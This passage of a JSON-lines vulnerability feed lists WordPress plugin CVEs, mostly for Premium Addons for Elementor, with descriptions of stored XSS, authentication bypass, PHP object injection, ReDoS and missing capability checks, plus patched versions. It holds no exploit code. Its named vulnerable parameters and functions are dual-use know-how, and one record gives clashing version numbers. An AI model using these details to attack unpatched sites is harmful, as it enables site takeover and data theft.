version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/996b44bb-d1e0-4f82-b8ee-a98b0ae994f9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/996b44bb-d1e0-4f82-b8ee-a98b0ae994f9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-product-category-discount\\\/trunk\\\/cd-admin.php#L171\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-product-category-discount\\\/trunk\\\/cd-admin.php#L171\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3026242%40woo-product-category-discount&new=3026242%40woo-product-category-discount&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3026242%40woo-product-category-discount&new=3026242%40woo-product-category-discount&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4774","slug":"premium-addons-for-elementor","versionImpact":"4.11.8","versionEndExcluding":"4.11.9","description":"The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the data-countdown attribute of Countdown widget in all versions up to, and including, 4.11.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.11.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/tags\\\/4.11.6\\\/assets\\\/frontend\\\/js\\\/jquery-countdown.js#L97\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/tags\\\/4.11.6\\\/assets\\\/frontend\\\/js\\\/jquery-countdown.js#L97\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/024af9de-d4c7-43ec-a602-c45ded3ddad3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/024af9de-d4c7-43ec-a602-c45ded3ddad3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9947","slug":"profilepress-pro","versionImpact":"4.11.1","versionEndExcluding":"4.11.2","description":"The ProfilePress Pro plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 4.11.1. This is due to insufficient verification on the user being returned by the social login token. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email and the user does not have an already-existing account for the service returning the token.","recommendation":"Update to version 4.11.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/61b477c3-88b7-45a4-9fc4-6bca6f7c3604?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/61b477c3-88b7-45a4-9fc4-6bca6f7c3604?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/profilepress.com\\\/\",\"name\":\"https:\\\/\\\/profilepress.com\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4413","slug":"motopress-hotel-booking-lite","versionImpact":"4.11.1","versionEndExcluding":"4.11.2","description":"The Hotel Booking Lite plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 4.11.1 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 4.11.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d7f1283-a274-49a2-8bec-da178771b13a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d7f1283-a274-49a2-8bec-da178771b13a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/motopress-hotel-booking-lite\\\/trunk\\\/includes\\\/shortcodes\\\/checkout-shortcode\\\/step-checkout.php#L149\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/motopress-hotel-booking-lite\\\/trunk\\\/includes\\\/shortcodes\\\/checkout-shortcode\\\/step-checkout.php#L149\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3084187%40motopress-hotel-booking-lite%2Ftrunk&old=3081058%40motopress-hotel-booking-lite%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3084187%40motopress-hotel-booking-lite%2Ftrunk&old=3081058%40motopress-hotel-booking-lite%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2328","slug":"real-media-library-lite","versionImpact":"4.22.11","versionEndExcluding":"4.11.12","description":"The Real Media Library: Media Library Folder & File Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the image title and alt text in all versions up to, and including, 4.22.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author access and higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.11.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d359dc78-fc90-4570-a768-5f1a05f865e1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d359dc78-fc90-4570-a768-5f1a05f865e1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/real-media-library-lite\\\/trunk\\\/inc\\\/view\\\/Gutenberg.php#L70\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/real-media-library-lite\\\/trunk\\\/inc\\\/view\\\/Gutenberg.php#L70\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3067589%40real-media-library-lite%2Ftrunk&old=3056657%40real-media-library-lite%2Ftrunk&sfp_email=&sfph_mail=#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3067589%40real-media-library-lite%2Ftrunk&old=3056657%40real-media-library-lite%2Ftrunk&sfp_email=&sfph_mail=#file4\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1420","slug":"ajax-search-lite","versionEndExcluding":"4.11.1","description":"The Ajax Search Lite WordPress plugin before 4.11.1, Ajax Search Pro WordPress plugin before 4.26.2 does not sanitise and escape a parameter before outputting it back in a response of an AJAX action, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a9a54ee5-2b80-4f55-894c-1047030eea7f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a9a54ee5-2b80-4f55-894c-1047030eea7f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3277","slug":"mstore-api","versionImpact":"4.10.7","versionEndExcluding":"4.10.8","description":"The MStore API plugin for WordPress is vulnerable to Unauthorized Account Access and Privilege Escalation in versions up to, and including, 4.10.7 due to improper implementation of the Apple login feature. This allows unauthenticated attackers to log in as any user as long as they know the user's email address. We are disclosing this issue as the developer has not yet released a patch, but continues to release updates and we escalated this issue to the plugin's team 30 days ago.","recommendation":"Update to version 4.10.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/controllers\\\/flutter-user.php#L821\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/controllers\\\/flutter-user.php#L821\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c7c0c35-5f44-488f-9fe1-269ea4a73854?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c7c0c35-5f44-488f-9fe1-269ea4a73854?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11937","slug":"premium-addons-for-elementor","versionImpact":"4.10.69","versionEndExcluding":"4.10.70","description":"The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's linkURL in the Mobile Menu element in all versions up to, and including, 4.10.69 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.10.70, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3210517%40premium-addons-for-elementor%2Ftrunk&old=3208033%40premium-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3210517%40premium-addons-for-elementor%2Ftrunk&old=3208033%40premium-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26337385-646f-4129-99be-7fa020f67f8e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26337385-646f-4129-99be-7fa020f67f8e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10266","slug":"premium-addons-for-elementor","versionImpact":"4.10.60","versionEndExcluding":"4.10.61","description":"The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Video Box widget in all versions up to, and including, 4.10.60 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.10.61, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6102c07-2776-4963-8d16-a779c5979275?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6102c07-2776-4963-8d16-a779c5979275?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176303\\\/premium-addons-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176303\\\/premium-addons-for-elementor\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6824","slug":"premium-addons-for-elementor","versionImpact":"4.10.38","versionEndExcluding":"4.10.39","description":"The Premium Addons for Elementor plugin for WordPress is vulnerable to unauthorized modification and loss of data due to a missing capability check on the 'check_temp_validity' and 'update_template_title' functions in all versions up to, and including, 4.10.38. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete arbitrary content and update post and page titles.","recommendation":"Update to version 4.10.39, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2840b9e-1baf-460c-ba11-43e4279ece27?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2840b9e-1baf-460c-ba11-43e4279ece27?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/includes\\\/addons-integration.php#L159\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/includes\\\/addons-integration.php#L159\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/includes\\\/addons-integration.php#L184\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/includes\\\/addons-integration.php#L184\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3131564\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3131564\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6495","slug":"premium-addons-for-elementor","versionImpact":"4.10.36","versionEndExcluding":"4.10.37","description":"The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Animated Text widget in all versions up to, and including, 4.10.36 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.10.37, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/005fc05c-6d82-49ca-b114-a3e64a3a572f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/005fc05c-6d82-49ca-b114-a3e64a3a572f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115459\\\/premium-addons-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115459\\\/premium-addons-for-elementor\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6340","slug":"premium-addons-for-elementor","versionImpact":"4.10.35","versionEndExcluding":"4.10.36","description":"The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Countdown widget in all versions up to, and including, 4.10.35 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ed80507-f3e5-45a8-9498-8cebf97155ff?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ed80507-f3e5-45a8-9498-8cebf97155ff?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/assets\\\/frontend\\\/js\\\/premium-countdown-timer.js#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/assets\\\/frontend\\\/js\\\/premium-countdown-timer.js#L31\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/assets\\\/frontend\\\/js\\\/premium-countdown-timer.js#L113\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/assets\\\/frontend\\\/js\\\/premium-countdown-timer.js#L113\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/premium-addons-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/premium-addons-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[\"Product\",\"Release Notes\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3111117\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3111117\\\/\",\"refsource\":\"\",\"tags\":[\"Patch\"]}]"}
{"CVE_ID":"CVE-2024-6434","slug":"premium-addons-for-elementor","versionImpact":"4.10.35","versionEndExcluding":"4.10.36","description":"The Premium Addons for Elementor plugin for WordPress is vulnerable to Regular Expression Denial of Service (ReDoS) in all versions up to, and including, 4.10.35. This is due to processing user-supplied input as a regular expression. This makes it possible for authenticated attackers, with Author-level access and above, to create and query a malicious post title, resulting in slowing server resources.","recommendation":"Update to version 4.10.36, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c59d95a-b7f1-4a04-bbf4-bab2c42d6d75?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c59d95a-b7f1-4a04-bbf4-bab2c42d6d75?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/includes\\\/class-premium-template-tags.php#L1676\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/includes\\\/class-premium-template-tags.php#L1676\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3110991\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3110991\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5553","slug":"premium-addons-for-elementor","versionImpact":"4.10.33","versionEndExcluding":"4.10.34","description":"The Premium Addons for Elementor plugin for WordPress is vulnerable to DOM-Based Stored Cross-Site Scripting via several parameters in all versions up to, and including, 4.10.33 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses and edits an injected element, and subsequently clicks the element with the mouse scroll wheel.","recommendation":"Update to version 4.10.34, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a80a3108-c685-4e26-9ecd-a0fe6ad4860c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a80a3108-c685-4e26-9ecd-a0fe6ad4860c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/tags\\\/4.10.32\\\/widgets\\\/premium-button.php#L2078\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/tags\\\/4.10.32\\\/widgets\\\/premium-button.php#L2078\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3101015\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3101015\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4379","slug":"premium-addons-for-elementor","versionImpact":"4.10.31","versionEndExcluding":"4.10.32","description":"The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Global Tooltip widget in all versions up to, and including, 4.10.31 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.10.32, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb0261c6-0477-4769-b92a-b49a192df4bb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb0261c6-0477-4769-b92a-b49a192df4bb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/tags\\\/4.10.31\\\/modules\\\/premium-global-tooltips\\\/module.php#L1247\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/tags\\\/4.10.31\\\/modules\\\/premium-global-tooltips\\\/module.php#L1247\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090037\\\/premium-addons-for-elementor\\\/trunk\\\/modules\\\/premium-global-tooltips\\\/module.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090037\\\/premium-addons-for-elementor\\\/trunk\\\/modules\\\/premium-global-tooltips\\\/module.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4376","slug":"premium-addons-for-elementor","versionImpact":"4.10.31","versionEndExcluding":"4.10.32","description":"The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Fancy Text widget in all versions up to, and including, 4.10.31 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. While 4.10.32 is patched, it is recommended to update to 4.10.33 because 4.10.32 caused a fatal error.","recommendation":"Update to version 4.10.32, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b49d166f-4df0-4997-a078-0be8fcd92576?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b49d166f-4df0-4997-a078-0be8fcd92576?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/widgets\\\/premium-fancytext.php#L924\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/widgets\\\/premium-fancytext.php#L924\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/assets\\\/frontend\\\/js\\\/typed.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/assets\\\/frontend\\\/js\\\/typed.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090037\\\/premium-addons-for-elementor\\\/trunk\\\/widgets\\\/premium-fancytext.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090037\\\/premium-addons-for-elementor\\\/trunk\\\/widgets\\\/premium-fancytext.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3090609%40premium-addons-for-elementor&new=3090609%40premium-addons-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3090609%40premium-addons-for-elementor&new=3090609%40premium-addons-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4205","slug":"premium-addons-for-elementor","versionImpact":"4.10.31","versionEndExcluding":"4.10.32","description":"The Premium Addons for Elementor plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_template_content() function in all versions up to, and including, 4.10.31. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve Elementor template data.","recommendation":"Update to version 4.10.32, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/175cb977-dcba-429f-814c-6de078e23472?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/175cb977-dcba-429f-814c-6de078e23472?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/tags\\\/4.10.28\\\/includes\\\/addons-integration.php#L1408\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/tags\\\/4.10.28\\\/includes\\\/addons-integration.php#L1408\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090037\\\/premium-addons-for-elementor\\\/trunk\\\/includes\\\/addons-integration.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090037\\\/premium-addons-for-elementor\\\/trunk\\\/includes\\\/addons-integration.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4378","slug":"premium-addons-for-elementor","versionImpact":"4.10.31","versionEndExcluding":"4.10.32","description":"The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's menu and shape widgets in all versions up to, and including, 4.10.30 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.10.32, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f891a6c8-3d06-432e-8651-bb689015af1c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f891a6c8-3d06-432e-8651-bb689015af1c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/includes\\\/pa-nav-menu-walker.php#L394\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/includes\\\/pa-nav-menu-walker.php#L394\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/modules\\\/premium-shape-divider\\\/module.php#L1047\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/modules\\\/premium-shape-divider\\\/module.php#L1047\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090037\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090037\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4203","slug":"premium-addons-for-elementor","versionImpact":"4.10.30","versionEndExcluding":"4.10.31","description":"The Premium Addons Pro for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the maps widget in all versions up to, and including, 4.10.30 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Please note this only affects sites running the premium version of the plugin.","recommendation":"Update to version 4.10.31, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51fab95e-336d-4544-8b8e-c4e9002321ec?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51fab95e-336d-4544-8b8e-c4e9002321ec?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3078006\\\/premium-addons-for-elementor\\\/trunk\\\/widgets\\\/premium-maps.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3078006\\\/premium-addons-for-elementor\\\/trunk\\\/widgets\\\/premium-maps.php\",\"refsource\":\"\",\"tags\":[]}]"}
